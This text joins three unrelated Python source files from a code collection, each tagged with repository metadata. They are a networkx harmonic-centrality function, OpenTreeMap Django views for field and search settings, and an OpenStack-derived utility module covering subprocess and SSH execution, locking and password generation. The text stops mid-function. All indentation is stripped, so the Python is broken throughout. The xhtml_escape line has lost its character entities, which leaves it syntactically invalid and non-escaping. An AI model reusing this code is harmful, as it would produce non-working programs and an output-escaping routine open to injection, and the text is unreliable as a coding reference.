betweenness_centrality, load_centrality, eigenvector_centrality,
degree_centrality, closeness_centrality
Notes
-----
If the 'distance' keyword is set to an edge attribute key then the
shortest-path length will be computed using Dijkstra's algorithm with
that edge attribute as the edge weight.
References
----------
.. [1] Boldi, Paolo, and Sebastiano Vigna. "Axioms for centrality."
Internet Mathematics 10.3-4 (2014): 222-262.
"""
if G.is_directed():
G = G.reverse()
sp = nx.shortest_path_length(G, weight=distance)
return {n: sum(1 / d if d > 0 else 0 for d in dd.values()) for n, dd in sp}
| cmtm/networkx | networkx/algorithms/centrality/harmonic.py | Python | bsd-3-clause | 1,825 |
# -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from copy import deepcopy
from django.utils.translation import ugettext as _
from opentreemap.util import json_from_request
from treemap.models import Species
from treemap.util import to_model_name, safe_get_model_class, to_object_name
from treemap.lib.object_caches import udf_defs
from treemap.search_fields import (
set_search_field_label, ALERT_IDENTIFIER_PATTERN, get_alert_field_info)
def set_fields(request, instance):
data = json_from_request(request)
instance.web_detail_fields = data['web_detail_fields']
instance.mobile_api_fields = data['mobile_api_fields']
instance.save()
return {'success': True}
def set_fields_page(request, instance):
mobile_field_groups = deepcopy(instance.mobile_api_fields)
web_field_groups = deepcopy(instance.web_detail_fields)
collection_groups = ('Stewardship', 'Alerts')
def get_disabled_fields(group):
model_name = to_model_name(group['model'])
Model = safe_get_model_class(model_name)
mobj = Model(instance=instance)
model_fields = {field for field in mobj.tracked_fields
if _should_show_field(mobj, field)}
model_fields = {'%s.%s' % (group['model'], f) for f in model_fields}
disabled_fields = model_fields - set(group['field_keys'])
return sorted(disabled_fields)
def get_disabled_cudfs(group):
if 'model' in group:
models = (to_model_name(group['model']), )
else:
models = ('Tree', 'Plot')
udfs = {udf.full_name for udf in udf_defs(instance)
if udf.iscollection and udf.model_type in models and
(group['header'] not in collection_groups
or udf.name == group['header'])}
disabled_cudfs = udfs - set(group['collection_udf_keys'])
return sorted(disabled_cudfs)
for field_groups in (web_field_groups, mobile_field_groups):
for group in field_groups:
if 'field_keys' in group:
group['disabled_fields'] = get_disabled_fields(group)
group['category'] = group['model']
if 'collection_udf_keys' in group:
group['disabled_cudf_fields'] = get_disabled_cudfs(group)
return {
'instance': instance,
'mobile_field_groups': mobile_field_groups,
'web_field_groups': web_field_groups,
}
def set_search_config(request, instance):
search_fields = json_from_request(request)
for prop in ('search_config', 'mobile_search_fields'):
config = deepcopy(getattr(instance, prop))
for key, val in search_fields[prop].iteritems():
config[key] = search_fields[prop][key]
setattr(instance, prop, config)
instance.save()
def search_config(request, instance):
return {
'instance': instance,
'website_field_groups': _website_search_config(instance),
'mobile_field_groups': _mobile_search_config(instance),
}
def _website_search_config(instance):
map_feature_types = sorted(instance.map_feature_types)
map_feature_types.remove('Plot')
model_names = ['Tree', 'Plot']
model_names.extend(map_feature_types)
fields_by_model = {model_name: sorted(_get_fields(instance, model_name))
for model_name in model_names}
def get_context_for_model(model_name):
model_fields = fields_by_model[model_name]
enabled, disabled = get_enabled_and_disabled_fields(model_name,
model_fields)
display_name = safe_get_model_class(model_name).display_name(instance)
return {
'field_keys': enabled,
'disabled_fields': disabled,
'header': _('%(model)s Filters') % {'model': display_name},
'category': model_name,
}
def get_context_for_missing():
all_fields = ['species.id', 'mapFeaturePhoto.id']
for model_name in model_names:
all_fields.extend(fields_by_model[model_name])
enabled, disabled = get_enabled_and_disabled_fields('missing',
all_fields)
enabled = _add_field_info(instance, enabled)
disabled = _add_field_info(instance, disabled)
return {
'field_keys': enabled,
'disabled_fields': disabled,
'header': _('Missing Data Filters'),
'category': 'missing'
}
def get_enabled_and_disabled_fields(category, fields):
current_search_fields = instance.search_config.get(category, [])
enabled_fields = [f['identifier'] for f in current_search_fields]
disabled_fields = (set(fields) - set(enabled_fields))
return enabled_fields, sorted(disabled_fields)
field_groups = [get_context_for_model(model_name)
for model_name in model_names]
field_groups.append(get_context_for_missing())
return field_groups
def _mobile_search_config(instance):
all_fields = []
for model_name in ['Tree', 'Plot', 'Species']:
all_fields += _get_fields(instance, model_name)
def get_context_for_group(category, header):
fields = list(all_fields)
if category == 'missing':
fields += ['species.id', 'mapFeaturePhoto.id']
else:
fields += ['species.id']
if contains_alerts():
fields += alert_identifiers()
enabled, disabled = get_enabled_and_disabled_fields(category, fields)
return {
'field_keys': enabled,
'disabled_fields': disabled,
'header': header,
'category': category
}
def get_enabled_and_disabled_fields(category, fields):
current_search_fields = instance.mobile_search_fields.get(category, [])
enabled_fields = [f['identifier'] for f in current_search_fields]
disabled_fields = set(fields) - set(enabled_fields)
return (_add_field_info(instance, enabled_fields),
sorted(_add_field_info(instance, disabled_fields)))
def contains_alerts():
return instance.url_name == 'latreemap'
def alert_identifiers():
def identifier(udf):
model_name = udf.model_type.lower()
return 'udf:%(model)s:%(pk)s.Status' % {
'model': model_name, 'pk': udf.pk}
return [identifier(udf) for udf in udf_defs(instance)
if udf.iscollection and udf.name == 'Alerts']
def add_alert_info(field_identifiers):
return [get_alert_field_info(id)
if ALERT_IDENTIFIER_PATTERN.match(id) else id
for id in field_identifiers]
return [
get_context_for_group('standard', _('Detail Filters')),
get_context_for_group('missing', _('Missing Data Filters'))
]
def _add_field_info(instance, field_names):
def field_context(identifier):
if ALERT_IDENTIFIER_PATTERN.match(identifier):
return get_alert_field_info(identifier, instance)
else:
return set_search_field_label(instance, {'identifier': field_name})
return [field_context(field_name) for field_name in field_names]
def _should_show_field(model, field_name):
if field_name.startswith('udf:'):
return True
elif field_name == 'id':
return False
elif model == Species:
# latreemap shows these; it's easiest to include them for all maps
return field_name in ['is_native', 'palatable_human']
field = model._meta.get_field(field_name)
return getattr(field, '_verbose_name', None) is not None
def _get_fields(instance, model_name):
Model = safe_get_model_class(model_name)
mobj = Model(instance=instance)
udfs = {udf.canonical_name
for udf in udf_defs(instance, model_name)
if not udf.iscollection}
concrete_fields = {
f.name for f in mobj._meta.get_fields(include_parents=False)
if _should_show_field(Model, f.name) and not f.is_relation}
model_fields = concrete_fields | udfs
model_fields = {'%s.%s' % (to_object_name(model_name), f)
for f in model_fields}
return model_fields
| maurizi/otm-core | opentreemap/manage_treemap/views/fields.py | Python | agpl-3.0 | 8,599 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Utilities and helper functions."""
import contextlib
import datetime
import errno
import functools
import hashlib
import inspect
import os
import pyclbr
import random
import re
import shlex
import shutil
import signal
import socket
import struct
import sys
import tempfile
import time
import uuid
import weakref
from xml.sax import saxutils
from eventlet import event
from eventlet.green import subprocess
from eventlet import greenthread
from eventlet import semaphore
import netaddr
from traffic.openstack.common.gettextutils import _
from traffic.common import deprecated
from traffic import exception
from traffic import flags
from traffic.openstack.common import cfg
from traffic.openstack.common import excutils
from traffic.openstack.common import importutils
from traffic.openstack.common import log as logging
from traffic.openstack.common import timeutils
LOG = logging.getLogger(__name__)
FLAGS = flags.FLAGS
FLAGS.register_opt(
cfg.BoolOpt('disable_process_locking', default=False,
help='Whether to disable inter-process locks'))
def vpn_ping(address, port, timeout=0.05, session_id=None):
"""Sends a vpn negotiation packet and returns the server session.
Returns False on a failure. Basic packet structure is below.
Client packet (14 bytes)::
0 1 8 9 13
+-+--------+-----+
|x| cli_id |?????|
+-+--------+-----+
x = packet identifier 0x38
cli_id = 64 bit identifier
? = unknown, probably flags/padding
Server packet (26 bytes)::
0 1 8 9 13 14 21 2225
+-+--------+-----+--------+----+
|x| srv_id |?????| cli_id |????|
+-+--------+-----+--------+----+
x = packet identifier 0x40
cli_id = 64 bit identifier
? = unknown, probably flags/padding
bit 9 was 1 and the rest were 0 in testing
"""
if session_id is None:
session_id = random.randint(0, 0xffffffffffffffff)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
data = struct.pack('!BQxxxxx', 0x38, session_id)
sock.sendto(data, (address, port))
sock.settimeout(timeout)
try:
received = sock.recv(2048)
except socket.timeout:
return False
finally:
sock.close()
fmt = '!BQxxxxxQxxxx'
if len(received) != struct.calcsize(fmt):
print struct.calcsize(fmt)
return False
(identifier, server_sess, client_sess) = struct.unpack(fmt, received)
if identifier == 0x40 and client_sess == session_id:
return server_sess
def _subprocess_setup():
# Python installs a SIGPIPE handler by default. This is usually not what
# non-Python subprocesses expect.
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
def execute(*cmd, **kwargs):
"""Helper method to execute command with optional retry.
If you add a run_as_root=True command, don't forget to add the
corresponding filter to etc/traffic/rootwrap.d !
:param cmd: Passed to subprocess.Popen.
:param process_input: Send to opened process.
:param check_exit_code: Single bool, int, or list of allowed exit
codes. Defaults to [0]. Raise
exception.ProcessExecutionError unless
program exits with one of these code.
:param delay_on_retry: True | False. Defaults to True. If set to
True, wait a short amount of time
before retrying.
:param attempts: How many times to retry cmd.
:param run_as_root: True | False. Defaults to False. If set to True,
the command is prefixed by the command specified
in the root_helper FLAG.
:raises exception.TrafficException: on receiving unknown arguments
:raises exception.ProcessExecutionError:
:returns: a tuple, (stdout, stderr) from the spawned process, or None if
the command fails.
"""
process_input = kwargs.pop('process_input', None)
check_exit_code = kwargs.pop('check_exit_code', [0])
ignore_exit_code = False
if isinstance(check_exit_code, bool):
ignore_exit_code = not check_exit_code
check_exit_code = [0]
elif isinstance(check_exit_code, int):
check_exit_code = [check_exit_code]
delay_on_retry = kwargs.pop('delay_on_retry', True)
attempts = kwargs.pop('attempts', 1)
run_as_root = kwargs.pop('run_as_root', False)
shell = kwargs.pop('shell', False)
if len(kwargs):
raise exception.TrafficException(_('Got unknown keyword args '
'to utils.execute: %r') % kwargs)
if run_as_root:
if FLAGS.rootwrap_config is None or FLAGS.root_helper != 'sudo':
deprecated.warn(_('The root_helper option (which lets you specify '
'a root wrapper different from traffic-rootwrap, '
'and defaults to using sudo) is now deprecated. '
'You should use the rootwrap_config option '
'instead.'))
if (FLAGS.rootwrap_config is not None):
cmd = ['sudo', 'traffic-rootwrap', FLAGS.rootwrap_config] + list(cmd)
else:
cmd = shlex.split(FLAGS.root_helper) + list(cmd)
cmd = map(str, cmd)
while attempts > 0:
attempts -= 1
try:
LOG.debug(_('Running cmd (subprocess): %s'), ' '.join(cmd))
_PIPE = subprocess.PIPE # pylint: disable=E1101
obj = subprocess.Popen(cmd,
stdin=_PIPE,
stdout=_PIPE,
stderr=_PIPE,
close_fds=True,
preexec_fn=_subprocess_setup,
shell=shell)
result = None
if process_input is not None:
result = obj.communicate(process_input)
else:
result = obj.communicate()
obj.stdin.close() # pylint: disable=E1101
_returncode = obj.returncode # pylint: disable=E1101
LOG.debug(_('Result was %s') % _returncode)
if not ignore_exit_code and _returncode not in check_exit_code:
(stdout, stderr) = result
print ' '.join(cmd)
raise exception.ProcessExecutionError(
exit_code=_returncode,
stdout=stdout,
stderr=stderr,
cmd=' '.join(cmd))
return result
except exception.ProcessExecutionError:
if not attempts:
raise
else:
LOG.debug(_('%r failed. Retrying.'), cmd)
if delay_on_retry:
greenthread.sleep(random.randint(20, 200) / 100.0)
finally:
# NOTE(termie): this appears to be necessary to let the subprocess
# call clean something up in between calls, without
# it two execute calls in a row hangs the second one
greenthread.sleep(0)
def trycmd(*args, **kwargs):
"""
A wrapper around execute() to more easily handle warnings and errors.
Returns an (out, err) tuple of strings containing the output of
the command's stdout and stderr. If 'err' is not empty then the
command can be considered to have failed.
:discard_warnings True | False. Defaults to False. If set to True,
then for succeeding commands, stderr is cleared
"""
discard_warnings = kwargs.pop('discard_warnings', False)
try:
out, err = execute(*args, **kwargs)
failed = False
except exception.ProcessExecutionError, exn:
out, err = '', str(exn)
failed = True
if not failed and discard_warnings and err:
# Handle commands that output to stderr but otherwise succeed
err = ''
return out, err
def ssh_execute(ssh, cmd, process_input=None,
addl_env=None, check_exit_code=True):
LOG.debug(_('Running cmd (SSH): %s'), ' '.join(cmd))
if addl_env:
raise exception.TrafficException(_('Environment not supported over SSH'))
if process_input:
# This is (probably) fixable if we need it...
msg = _('process_input not supported over SSH')
raise exception.TrafficException(msg)
stdin_stream, stdout_stream, stderr_stream = ssh.exec_command(cmd)
channel = stdout_stream.channel
#stdin.write('process_input would go here')
#stdin.flush()
# NOTE(justinsb): This seems suspicious...
# ...other SSH clients have buffering issues with this approach
stdout = stdout_stream.read()
stderr = stderr_stream.read()
stdin_stream.close()
exit_status = channel.recv_exit_status()
# exit_status == -1 if no exit code was returned
if exit_status != -1:
LOG.debug(_('Result was %s') % exit_status)
if check_exit_code and exit_status != 0:
raise exception.ProcessExecutionError(exit_code=exit_status,
stdout=stdout,
stderr=stderr,
cmd=' '.join(cmd))
return (stdout, stderr)
def trafficdir():
import traffic
return os.path.abspath(traffic.__file__).split('traffic/__init__.py')[0]
def debug(arg):
LOG.debug(_('debug in callback: %s'), arg)
return arg
def generate_uid(topic, size=8):
characters = '01234567890abcdefghijklmnopqrstuvwxyz'
choices = [random.choice(characters) for _x in xrange(size)]
return '%s-%s' % (topic, ''.join(choices))
# Default symbols to use for passwords. Avoids visually confusing characters.
# ~6 bits per symbol
DEFAULT_PASSWORD_SYMBOLS = ('23456789', # Removed: 0,1
'ABCDEFGHJKLMNPQRSTUVWXYZ', # Removed: I, O
'abcdefghijkmnopqrstuvwxyz') # Removed: l
# ~5 bits per symbol
EASIER_PASSWORD_SYMBOLS = ('23456789', # Removed: 0, 1
'ABCDEFGHJKLMNPQRSTUVWXYZ') # Removed: I, O
def last_completed_audit_period(unit=None, before=None):
"""This method gives you the most recently *completed* audit period.
arguments:
units: string, one of 'hour', 'day', 'month', 'year'
Periods normally begin at the beginning (UTC) of the
period unit (So a 'day' period begins at midnight UTC,
a 'month' unit on the 1st, a 'year' on Jan, 1)
unit string may be appended with an optional offset
like so: 'day@18' This will begin the period at 18:00
UTC. 'month@15' starts a monthly period on the 15th,
and year@3 begins a yearly one on March 1st.
before: Give the audit period most recently completed before
<timestamp>. Defaults to now.
returns: 2 tuple of datetimes (begin, end)
The begin timestamp of this audit period is the same as the
end of the previous."""
if not unit:
unit = FLAGS.instance_usage_audit_period
offset = 0
if '@' in unit:
unit, offset = unit.split("@", 1)
offset = int(offset)
if before is not None:
rightnow = before
else:
rightnow = timeutils.utcnow()
if unit not in ('month', 'day', 'year', 'hour'):
raise ValueError('Time period must be hour, day, month or year')
if unit == 'month':
if offset == 0:
offset = 1
end = datetime.datetime(day=offset,
month=rightnow.month,
year=rightnow.year)
if end >= rightnow:
year = rightnow.year
if 1 >= rightnow.month:
year -= 1
month = 12 + (rightnow.month - 1)
else:
month = rightnow.month - 1
end = datetime.datetime(day=offset,
month=month,
year=year)
year = end.year
if 1 >= end.month:
year -= 1
month = 12 + (end.month - 1)
else:
month = end.month - 1
begin = datetime.datetime(day=offset, month=month, year=year)
elif unit == 'year':
if offset == 0:
offset = 1
end = datetime.datetime(day=1, month=offset, year=rightnow.year)
if end >= rightnow:
end = datetime.datetime(day=1,
month=offset,
year=rightnow.year - 1)
begin = datetime.datetime(day=1,
month=offset,
year=rightnow.year - 2)
else:
begin = datetime.datetime(day=1,
month=offset,
year=rightnow.year - 1)
elif unit == 'day':
end = datetime.datetime(hour=offset,
day=rightnow.day,
month=rightnow.month,
year=rightnow.year)
if end >= rightnow:
end = end - datetime.timedelta(days=1)
begin = end - datetime.timedelta(days=1)
elif unit == 'hour':
end = rightnow.replace(minute=offset, second=0, microsecond=0)
if end >= rightnow:
end = end - datetime.timedelta(hours=1)
begin = end - datetime.timedelta(hours=1)
return (begin, end)
def generate_password(length=20, symbolgroups=DEFAULT_PASSWORD_SYMBOLS):
"""Generate a random password from the supplied symbol groups.
At least one symbol from each group will be included. Unpredictable
results if length is less than the number of symbol groups.
Believed to be reasonably secure (with a reasonable password length!)
"""
r = random.SystemRandom()
# NOTE(jerdfelt): Some password policies require at least one character
# from each group of symbols, so start off with one random character
# from each symbol group
password = [r.choice(s) for s in symbolgroups]
# If length < len(symbolgroups), the leading characters will only
# be from the first length groups. Try our best to not be predictable
# by shuffling and then truncating.
r.shuffle(password)
password = password[:length]
length -= len(password)
# then fill with random characters from all symbol groups
symbols = ''.join(symbolgroups)
password.extend([r.choice(symbols) for _i in xrange(length)])
# finally shuffle to ensure first x characters aren't from a
# predictable group
r.shuffle(password)
return ''.join(password)
def last_octet(address):
return int(address.split('.')[-1])
def get_my_linklocal(interface):
try:
if_str = execute('ip', '-f', 'inet6', '-o', 'addr', 'show', interface)
condition = '\s+inet6\s+([0-9a-f:]+)/\d+\s+scope\s+link'
links = [re.search(condition, x) for x in if_str[0].split('\n')]
address = [w.group(1) for w in links if w is not None]
if address[0] is not None:
return address[0]
else:
msg = _('Link Local address is not found.:%s') % if_str
raise exception.TrafficException(msg)
except Exception as ex:
msg = _("Couldn't get Link Local IP of %(interface)s"
" :%(ex)s") % locals()
raise exception.TrafficException(msg)
def parse_mailmap(mailmap='.mailmap'):
mapping = {}
if os.path.exists(mailmap):
fp = open(mailmap, 'r')
for l in fp:
l = l.strip()
if not l.startswith('#') and ' ' in l:
canonical_email, alias = l.split(' ')
mapping[alias.lower()] = canonical_email.lower()
return mapping
def str_dict_replace(s, mapping):
for s1, s2 in mapping.iteritems():
s = s.replace(s1, s2)
return s
class LazyPluggable(object):
"""A pluggable backend loaded lazily based on some value."""
def __init__(self, pivot, **backends):
self.__backends = backends
self.__pivot = pivot
self.__backend = None
def __get_backend(self):
if not self.__backend:
backend_name = FLAGS[self.__pivot]
if backend_name not in self.__backends:
msg = _('Invalid backend: %s') % backend_name
raise exception.TrafficException(msg)
backend = self.__backends[backend_name]
if isinstance(backend, tuple):
name = backend[0]
fromlist = backend[1]
else:
name = backend
fromlist = backend
self.__backend = __import__(name, None, None, fromlist)
LOG.debug(_('backend %s'), self.__backend)
return self.__backend
def __getattr__(self, key):
backend = self.__get_backend()
return getattr(backend, key)
class LoopingCallDone(Exception):
"""Exception to break out and stop a LoopingCall.
The poll-function passed to LoopingCall can raise this exception to
break out of the loop normally. This is somewhat analogous to
StopIteration.
An optional return-value can be included as the argument to the exception;
this return-value will be returned by LoopingCall.wait()
"""
def __init__(self, retvalue=True):
""":param retvalue: Value that LoopingCall.wait() should return."""
self.retvalue = retvalue
class LoopingCall(object):
def __init__(self, f=None, *args, **kw):
self.args = args
self.kw = kw
self.f = f
self._running = False
def start(self, interval, initial_delay=None):
self._running = True
done = event.Event()
def _inner():
if initial_delay:
greenthread.sleep(initial_delay)
try:
while self._running:
self.f(*self.args, **self.kw)
if not self._running:
break
greenthread.sleep(interval)
except LoopingCallDone, e:
self.stop()
done.send(e.retvalue)
except Exception:
LOG.exception(_('in looping call'))
done.send_exception(*sys.exc_info())
return
else:
done.send(True)
self.done = done
greenthread.spawn(_inner)
return self.done
def stop(self):
self._running = False
def wait(self):
return self.done.wait()
def xhtml_escape(value):
"""Escapes a string so it is valid within XML or XHTML.
"""
return saxutils.escape(value, {'"': '"', "'": '''})
def utf8(value):
"""Try to turn a string into utf-8 if possible.
Code is directly from the utf8 function in
http://github.com/facebook/tornado/blob/master/tornado/escape.py
"""
if isinstance(value, unicode):
return value.encode('utf-8')
assert isinstance(value, str)
return value
class _InterProcessLock(object):
"""Lock implementation which allows multiple locks, working around
issues like bugs.debian.org/cgi-bin/bugreport.cgi?bug=632857 and does
not require any cleanup. Since the lock is always held on a file
descriptor rather than outside of the process, the lock gets dropped
automatically if the process crashes, even if __exit__ is not executed.
There are no guarantees regarding usage by multiple green threads in a
single process here. This lock works only between processes. Exclusive
access between local threads should be achieved using the semaphores
in the @synchronized decorator.
Note these locks are released when the descriptor is closed, so it's not
safe to close the file descriptor while another green thread holds the
lock. Just opening and closing the lock file can break synchronisation,
so lock files must be accessed only using this abstraction.
"""
def __init__(self, name):
self.lockfile = None
self.fname = name
def __enter__(self):
self.lockfile = open(self.fname, 'w')
while True:
try:
# Using non-blocking locks since green threads are not
# patched to deal with blocking locking calls.
# Also upon reading the MSDN docs for locking(), it seems
# to have a laughable 10 attempts "blocking" mechanism.
self.trylock()
return self
except IOError, e:
if e.errno in (errno.EACCES, errno.EAGAIN):
# external locks synchronise things like iptables
# updates - give it some time to prevent busy spinning
time.sleep(0.01)
else:
raise
def __exit__(self, exc_type, exc_val, exc_tb):
try:
self.unlock()
self.lockfile.close()
except IOError:
LOG.exception(_("Could not release the acquired lock `%s`")
% self.fname)
def trylock(self):
raise NotImplementedError()
def unlock(self):
raise NotImplementedError()
class _WindowsLock(_InterProcessLock):
def trylock(self):
msvcrt.locking(self.lockfile, msvcrt.LK_NBLCK, 1)
def unlock(self):
msvcrt.locking(self.lockfile, msvcrt.LK_UNLCK, 1)
class _PosixLock(_InterProcessLock):
def trylock(self):
fcntl.lockf(self.lockfile, fcntl.LOCK_EX | fcntl.LOCK_NB)
def unlock(self):
fcntl.lockf(self.lockfile, fcntl.LOCK_UN)
if os.name == 'nt':
import msvcrt
InterProcessLock = _WindowsLock
else:
import fcntl
InterProcessLock = _PosixLock
_semaphores = weakref.WeakValueDictionary()
def synchronized(name, external=False, lock_path=None):
"""Synchronization decorator.
Decorating a method like so::
@synchronized('mylock')
def foo(self, *args):
...
ensures that only one thread will execute the bar method at a time.
Different methods can share the same lock::
@synchronized('mylock')
def foo(self, *args):
...
@synchronized('mylock')
def bar(self, *args):
...
This way only one of either foo or bar can be executing at a time.
The external keyword argument denotes whether this lock should work across
multiple processes. This means that if two different workers both run a
a method decorated with @synchronized('mylock', external=True), only one
of them will execute at a time.
The lock_path keyword argument is used to specify a special location for
external lock files to live. If nothing is set, then FLAGS.lock_path is
used as a default.
"""
def wrap(f):
@functools.wraps(f)
def inner(*args, **kwargs):
# NOTE(soren): If we ever go natively threaded, this will be racy.
# See http://stackoverflow.com/questions/5390569/dyn
# amically-allocating-and-destroying-mutexes
sem = _semaphores.get(name, semaphore.Semaphore())
if name not in _semaphores:
# this check is not racy - we're already holding ref locally
# so GC won't remove the item and there was no IO switch
# (only valid in greenthreads)
_semaphores[name] = sem
with sem:
LOG.debug(_('Got semaphore "%(lock)s" for method '
'"%(method)s"...'), {'lock': name,
'method': f.__name__})
if external and not FLAGS.disable_process_locking:
LOG.debug(_('Attempting to grab file lock "%(lock)s" for '
'method "%(method)s"...'),
{'lock': name, 'method': f.__name__})
cleanup_dir = False
# We need a copy of lock_path because it is non-local
local_lock_path = lock_path
if not local_lock_path:
local_lock_path = FLAGS.lock_path
if not local_lock_path:
cleanup_dir = True
local_lock_path = tempfile.mkdtemp()
if not os.path.exists(local_lock_path):
cleanup_dir = True
ensure_tree(local_lock_path)
# NOTE(mikal): the lock name cannot contain directory
# separators
safe_name = name.replace(os.sep, '_')
lock_file_path = os.path.join(local_lock_path,
'traffic-%s' % safe_name)
try:
lock = InterProcessLock(lock_file_path)
with lock:
LOG.debug(_('Got file lock "%(lock)s" for '
'method "%(method)s"...'),
{'lock': name, 'method': f.__name__})
retval = f(*args, **kwargs)
finally:
# NOTE(vish): This removes the tempdir if we needed
# to create one. This is used to cleanup
# the locks left behind by unit tests.
if cleanup_dir:
shutil.rmtree(local_lock_path)
else:
retval = f(*args, **kwargs)
return retval
return inner
return wrap
def delete_if_exists(pathname):
"""delete a file, but ignore file not found error"""
try:
os.unlink(pathname)
except OSError as e:
if e.errno == errno.ENOENT:
return
else:
raise
def get_from_path(items, path):
"""Returns a list of items matching the specified path.
Takes an XPath-like expression e.g. prop1/prop2/prop3, and for each item
in items, looks up items[prop1][prop2][prop3]. Like XPath, if any of the
intermediate results are lists it will treat each list item individually.
A 'None' in items or any child expressions will be ignored, this function
will not throw because of None (anywhere) in items. The returned list
will contain no None values.
"""
if path is None:
raise exception.TrafficException('Invalid mini_xpath')
(first_token, sep, remainder) = path.partition('/')
if first_token == '':
raise exception.TrafficException('Invalid mini_xpath')
results = []
if items is None:
return results
if not isinstance(items, list):
# Wrap single objects in a list
items = [items]
for item in items:
if item is None:
continue
get_method = getattr(item, 'get', None)
if get_method is None:
continue
child = get_method(first_token)
if child is None:
continue
if isinstance(child, list):
# Flatten intermediate lists
for x in child:
results.append(x)
else:
results.append(child)
if not sep:
# No more tokens
return results
else:
return get_from_path(results, remainder)
def flatten_dict(dict_, flattened=None):
"""Recursively flatten a nested dictionary."""
flattened = flattened or {}
for key, value in dict_.iteritems():
if hasattr(value, 'iteritems'):
flatten_dict(value, flattened)
else:
flattened[key] = value
return flattened
def partition_dict(dict_, keys):
"""Return two dicts, one with `keys` the other with everything else."""
intersection = {}
difference = {}
for key, value in dict_.iteritems():
if key in keys:
intersection[key] = value
else:
difference[key] = value
return intersection, difference
def map_dict_keys(dict_, key_map):
"""Return a dict in which the dictionaries keys are mapped to new keys."""
mapped = {}
for key, value in dict_.iteritems():
mapped_key = key_map[key] if key in key_map else key
mapped[mapped_key] = value
return mapped
def subset_dict(dict_, keys):
"""Return a dict that only contains a subset of keys."""
subset = partition_dict(dict_, keys)[0]
return subset
def diff_dict(orig, new):
"""
Return a dict describing how to change orig to new. The keys
correspond to values that have changed; the value will be a list
of one or two elements. The first element of the list will be
either '+' or '-', indicating whether the key was updated or
deleted; if the key was updated, the list will contain a second
element, giving the updated value.
"""
# Figure out what keys went away
result = dict((k, ['-']) for k in set(orig.keys()) - set(new.keys()))
# Compute the updates
for key, value in new.items():
if key not in orig or value != orig[key]:
result[key] = ['+', value]
return result
def check_isinstance(obj, cls):
"""Checks that obj is of type cls, and lets PyLint infer types."""
if isinstance(obj, cls):
return obj
raise Exception(_('Expected object of type: %s') % (str(cls)))
def parse_server_string(server_str):
"""
Parses the given server_string and returns a list of host and port.
If it's not a combination of host part and port, the port element
is a null string. If the input is invalid expression, return a null
list.
"""
try:
# First of all, exclude pure IPv6 address (w/o port).
if netaddr.valid_ipv6(server_str):
return (server_str, '')
# Next, check if this is IPv6 address with a port number combination.
if server_str.find("]:") != -1:
(address, port) = server_str.replace('[', '', 1).split(']:')
return (address, port)
# Third, check if this is a combination of an address and a port
if server_str.find(':') == -1:
return (server_str, '')
# This must be a combination of an address and a port
(address, port) = server_str.split(':')
return (address, port)
except Exception:
LOG.error(_('Invalid server_string: %s'), server_str)
return ('', '')
def gen_uuid():
return uuid.uuid4()
def is_uuid_like(val):
"""For our purposes, a UUID is a string in canonical form:
aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa
"""
try:
uuid.UUID(val)
return True
except (TypeError, ValueError, AttributeError):
return False
def bool_from_str(val):
"""Convert a string representation of a bool into a bool value"""
if not val:
return False
try:
return True if int(val) else False
except ValueError:
return val.lower() == 'true' or \
val.lower() == 'yes' or \
val.lower() == 'y'
def is_valid_boolstr(val):
"""Check if the provided string is a valid bool string or not. """
val = str(val).lower()
return val == 'true' or val == 'false' or \
val == 'yes' or val == 'no' or \
val == 'y' or val == 'n' or \
val == '1' or val == '0'
def is_valid_ipv4(address):
"""valid the address strictly as per format xxx.xxx.xxx.xxx.
where xxx is a value between 0 and 255.
"""
parts = address.split(".")
if len(parts) != 4:
return False
for item in parts:
try:
if not 0 <= int(item) <= 255:
return False
except ValueError:
return False
return True
def is_valid_cidr(address):
"""Check if the provided ipv4 or ipv6 address is a valid
CIDR address or not"""
try:
# Validate the correct CIDR Address
netaddr.IPNetwork(address)
except netaddr.core.AddrFormatError:
return False
except UnboundLocalError:
# NOTE(MotoKen): work around bug in netaddr 0.7.5 (see detail in
# https://github.com/drkjam/netaddr/issues/2)
return False
# Prior validation partially verify /xx part
# Verify it here
ip_segment = address.split('/')
if (len(ip_segment) <= 1 or
ip_segment[1] == ''):
return False
return True
def monkey_patch():
""" If the Flags.monkey_patch set as True,
this function patches a decorator
for all functions in specified modules.
You can set decorators for each modules
using FLAGS.monkey_patch_modules.
The format is "Module path:Decorator function".
Example: 'traffic.api.ec2.cloud:traffic.notifier.api.notify_decorator'
Parameters of the decorator is as follows.
(See traffic.notifier.api.notify_decorator)
name - name of the function
function - object of the function
"""
# If FLAGS.monkey_patch is not True, this function do nothing.
if not FLAGS.monkey_patch:
return
# Get list of modules and decorators
for module_and_decorator in FLAGS.monkey_patch_modules:
module, decorator_name = module_and_decorator.split(':')
# import decorator function
decorator = importutils.import_class(decorator_name)
__import__(module)
# Retrieve module information using pyclbr
module_data = pyclbr.readmodule_ex(module)
for key in module_data.keys():
# set the decorator for the class methods
if isinstance(module_data[key], pyclbr.Class):
clz = importutils.import_class("%s.%s" % (module, key))
for method, func in inspect.getmembers(clz, inspect.ismethod):
setattr(clz, method,
decorator("%s.%s.%s" % (module, key, method), func))
# set the decorator for the function
if isinstance(module_data[key], pyclbr.Function):
func = importutils.import_class("%s.%s" % (module, key))
setattr(sys.modules[module], key,
decorator("%s.%s" % (module, key), func))
def convert_to_list_dict(lst, label):
"""Convert a value or list into a list of dicts"""
if not lst:
return None
if not isinstance(lst, list):
lst = [lst]
return [{label: x} for x in lst]
def timefunc(func):
"""Decorator that logs how long a particular function took to execute"""
@functools.wraps(func)
def inner(*args, **kwargs):
start_time = time.time()
try:
return func(*args, **kwargs)
finally:
total_time = time.time() - start_time
LOG.debug(_("timefunc: '%(name)s' took %(total_time).2f secs") %
dict(name=func.__name__, total_time=total_time))
return inner
def generate_glance_url():
"""Generate the URL to glance."""
# TODO(jk0): This will eventually need to take SSL into consideration
# when supported in glance.
